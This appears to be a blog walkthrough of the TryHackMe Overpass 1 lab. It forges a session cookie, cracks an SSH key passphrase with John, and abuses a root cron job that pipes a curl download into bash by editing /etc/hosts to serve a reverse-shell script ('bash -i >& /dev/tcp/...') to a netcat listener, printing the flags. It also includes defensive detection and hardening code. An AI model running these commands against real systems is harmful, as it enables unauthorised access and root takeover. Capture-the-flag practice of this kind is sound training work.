Overpass 1 Walkthrough

Babs - Aug 28 - Dev Community

I started by running an nmap scan with the command below to discover the open ports:

nmap -A -p- 10.10.76.67

From the scan output we can see that ports 22, 80 and 31448 are open.

Next I visited the web page at 10.10.76.67 in my browser.

After a good deal of enumeration I did not find much on the page, so the next step was to use ffuf to look for hidden web directories.

To do that I used the command:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://10.10.76.67/FUZZ

The results show that an admin page is available, so I visited it in my browser at:

10.10.76.67/admin

A login page is shown. I had no credentials, so I right-clicked the page and chose View Page Source.

The page source references a script, login.js. Clicking it opens the script itself.

The script shows that the page makes a POST request to "/api/login" with a username and password, and that the login session is carried in a cookie named SessionToken.
The vulnerability is that the admin page treats any request carrying that cookie as already logged in, whatever its value, so we only need to set the cookie ourselves.
To do that, copy the cookie name, SessionToken, highlighted in the script, and keep it somewhere handy.

Next, open the browser developer tools by right-clicking on the page and selecting "Inspect".

Then select the Storage tab.

Now create a new cookie named SessionToken (the name copied earlier) and give it any value of your choice.
To do that, click the + button.

Then change the new cookie's name to SessionToken.

NB: the leading "S" is cut off in the screenshot because of the view size, but it is there, so make sure the name is copied and pasted correctly.

I set the value to "hacker", but any word of your choice works.

Then refresh the page.

The admin page accepts the forged cookie and you are now logged in.
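
To see the root cause from the server's side, here is an added example (not code from the Overpass room or from this post): a presence-only cookie check modelled on the behaviour observed above, beside a check that only accepts tokens the server itself issued. The function and class names, and the assumption that the server's logic is a bare existence test on the cookie, are mine.

```python
"""A presence-only session check next to one that validates server-issued tokens.

Added example, not code from the Overpass room or the original post. The weak
check is an assumption about the server's logic, modelled on what the walkthrough
observes: any SessionToken value is accepted. Names are hypothetical.
"""
import hmac
import secrets
from http.cookies import SimpleCookie

# Constructed sample: the Cookie header a browser sends after the manual edit
# above (name copied from login.js, value "hacker").
FORGED_COOKIE_HEADER = "SessionToken=hacker"


def parse_cookies(header: str) -> dict:
    """Parse a raw Cookie request header into a name -> value dict."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def is_admin_vulnerable(cookie_header: str) -> bool:
    """Assumed weak logic: the request is 'logged in' if the cookie exists at all."""
    return "SessionToken" in parse_cookies(cookie_header)


class SessionStore:
    """Server-side record of the tokens /api/login actually issued."""

    def __init__(self):
        self._sessions = {}  # token -> username

    def issue(self, username: str) -> str:
        """Mint an unguessable token after a successful credential check."""
        token = secrets.token_urlsafe(32)
        self._sessions[token] = username
        return token

    def lookup(self, presented: str):
        """Username for a presented token, or None; constant-time compare per entry."""
        wanted = presented.encode()
        for token, user in self._sessions.items():
            if hmac.compare_digest(token.encode(), wanted):
                return user
        return None


def is_admin_hardened(cookie_header: str, store: SessionStore) -> bool:
    """Hardened check: the cookie value must be a token the server itself issued."""
    token = parse_cookies(cookie_header).get("SessionToken")
    return bool(token) and store.lookup(token) is not None


def demo() -> dict:
    """Run the forged cookie and a real one through both checks."""
    store = SessionStore()
    real = store.issue("james")
    return {
        "forged_vs_vulnerable": is_admin_vulnerable(FORGED_COOKIE_HEADER),    # True
        "forged_vs_hardened": is_admin_hardened(FORGED_COOKIE_HEADER, store),  # False
        "real_vs_hardened": is_admin_hardened(f"SessionToken={real}", store),  # True
    }


if __name__ == "__main__":
    print(demo())
```

The point of the hardened version is that the cookie is just a lookup key: the server decides who is logged in from state it created itself, so a value typed into the Storage tab matches nothing and is refused.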

The admin page displays a passphrase-protected RSA private key, whose passphrase we need to crack with John the Ripper.

First we copy the key and convert it into a hash format John can work with. Start by saving the key to a file; I named mine "id_rsa".

After copying the key, run the command below to create the file:

nano id_rsa

Paste the copied key into the editor and save.

Run the command below to find the path of ssh2john, which converts the key into a hash that John the Ripper can crack:

locate ssh2john

Copy the "/usr/share/john/ssh2john.py" path.

Use the command below to convert the key and save the result to a file named hash:

/usr/share/john/ssh2john.py id_rsa > hash

Then run the command below to crack the hash with John using the rockyou.txt wordlist:

john hash --wordlist=/usr/share/wordlists/rockyou.txt

John recovers the passphrase: "james13".

Now we go back to the admin page.

The admin page tells us the key belongs to the user james, and we have cracked its passphrase, "james13".

It also notes that SSH access has been set up for james, so we have everything needed to log in as that user.

Before using the key with SSH, restrict the permissions of the id_rsa file:

chmod 600 id_rsa

Then SSH in as james with the key:

ssh -i id_rsa james@10.10.21.149

When prompted for the key passphrase, enter "james13".

We are now logged in as james.

Run the command below to read the user flag:

cat user.txt

The flag is "thm{65c1aaf000506e56996822c6281e6bf7}"

Now we need to escalate privileges to read the root flag.

The todo.txt file mentions an automated task that runs continuously.

We can confirm this by checking the system crontab:

cat /etc/crontab

The highlighted entry is the one we are interested in, because it uses curl to fetch a script and pipes the result straight into bash to execute it.

Next, look at how that hostname is resolved:

cat /etc/hosts

The overpass.thm domain points to the local host, but we need to replace that with the IP address of our vulnerable machine.
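
For a defender reviewing a box like this, the two conditions that combine here are a scheduled job that pipes a download into a shell and a hosts file that an unprivileged user can edit. Below is an added example (not from the room or this post) that flags both on constructed input; the sample crontab, the sample hosts file, the file modes and the regex heuristic are my own, with the hostname and script path taken from the walkthrough.

```python
"""Flag cron jobs that pipe a download into a shell, and check /etc/hosts ownership/mode.

Added example, not code from the Overpass room or the original post. The
crontab and hosts text below are constructed samples; the regex is a heuristic.
"""
import re
import stat

# Constructed sample modelled on the entry described in the walkthrough: a job
# fetches a script by hostname and pipes it straight into bash.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
0 3 * * * root /usr/local/bin/backup.sh
"""

# Constructed sample hosts file: the hostname the job fetches from is resolved locally.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
127.0.0.1 overpass.thm
"""

# A fetch tool whose output is piped into a shell interpreter.
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")


def find_fetch_to_shell(crontab_text: str) -> list:
    """Return (line_no, entry) for crontab entries that pipe a download into a shell."""
    hits = []
    for no, line in enumerate(crontab_text.splitlines(), start=1):
        entry = line.strip()
        if not entry or entry.startswith("#") or "=" in entry.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        if FETCH_TO_SHELL.search(entry):
            hits.append((no, entry))
    return hits


def fetched_host(entry: str) -> str:
    """Pull the hostname out of the curl/wget URL in a flagged entry (skips leading flags)."""
    m = re.search(r"\b(?:curl|wget)\s+(?:-\S+\s+)*(\S+)", entry)
    if not m:
        return ""
    url = m.group(1)
    url = url.split("://", 1)[1] if "://" in url else url
    return url.split("/", 1)[0]


def hosts_entries_for(hosts_text: str, hostname: str) -> list:
    """Return the IPs that a hosts file maps the given hostname to."""
    ips = []
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2 and hostname in fields[1:]:
            ips.append(fields[0])
    return ips


def hosts_file_risk(mode: int, owner_uid: int) -> list:
    """List why a hosts file with this mode/owner could be rewritten by a non-root user."""
    problems = []
    if owner_uid != 0:
        problems.append("not owned by root")
    if mode & stat.S_IWGRP:
        problems.append("group-writable")
    if mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems


def audit(crontab_text: str, hosts_text: str, hosts_mode: int, hosts_uid: int) -> list:
    """Combine the checks into findings a reviewer can act on."""
    findings = []
    for no, entry in find_fetch_to_shell(crontab_text):
        host = fetched_host(entry)
        mapped = hosts_entries_for(hosts_text, host)
        findings.append(
            f"crontab line {no}: pipes download from {host or '?'} into a shell"
            + (f"; {host} resolved via hosts file to {', '.join(mapped)}" if mapped else "")
        )
    for problem in hosts_file_risk(hosts_mode, hosts_uid):
        findings.append(f"/etc/hosts is {problem}: hostnames can be redirected")
    return findings


if __name__ == "__main__":
    # 0o666 with uid 0 is a constructed example of a misconfigured hosts file.
    for finding in audit(SAMPLE_CRONTAB, SAMPLE_HOSTS, 0o666, 0):
        print(finding)
```

On a real host you would feed `audit` the contents of /etc/crontab (and the files under /etc/cron.d) together with `os.stat("/etc/hosts").st_mode` and `.st_uid`. Either finding alone is worth fixing; together they mean whoever can edit the hosts file chooses what the scheduled job executes.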

Open the hosts file for editing:

nano /etc/hosts

Then change the IP address to the vulnerable machine's IP.

Now run the command below on your attack box (not in the james SSH session):

mkdir -p downloads/src/

Then create the script:

nano downloads/src/buildscript.sh

and paste the line below into it:

bash -i >& /dev/tcp/10.9.1.128/1337 0>&1

NB: replace the IP address with your attack machine's IP address.

Save and exit nano.

Open a new terminal tab and start a netcat listener:

nc -nvlp 1337

Then, in another tab, start a web server to host the script:

python3 -m http.server 80

Once the cron job fetches and runs the script, the listener receives a root shell.

The flag for root is:

thm{7f336f8c359dbac18d54fdd64ea753bb}

CHALLENGES YOU MIGHT FACE

You might get confused about which IP address is which. Note that this room is from TryHackMe, and the vulnerable machine's IP address is the one shown for the machine you deployed.

Your attacking machine's IP address is the one TryHackMe assigns to you after you connect with OpenVPN.

It is also the address of your tun0 interface when checked on Kali.

Happy Hacking!!!

It was written as an easy room but it definitely wasn't easy!
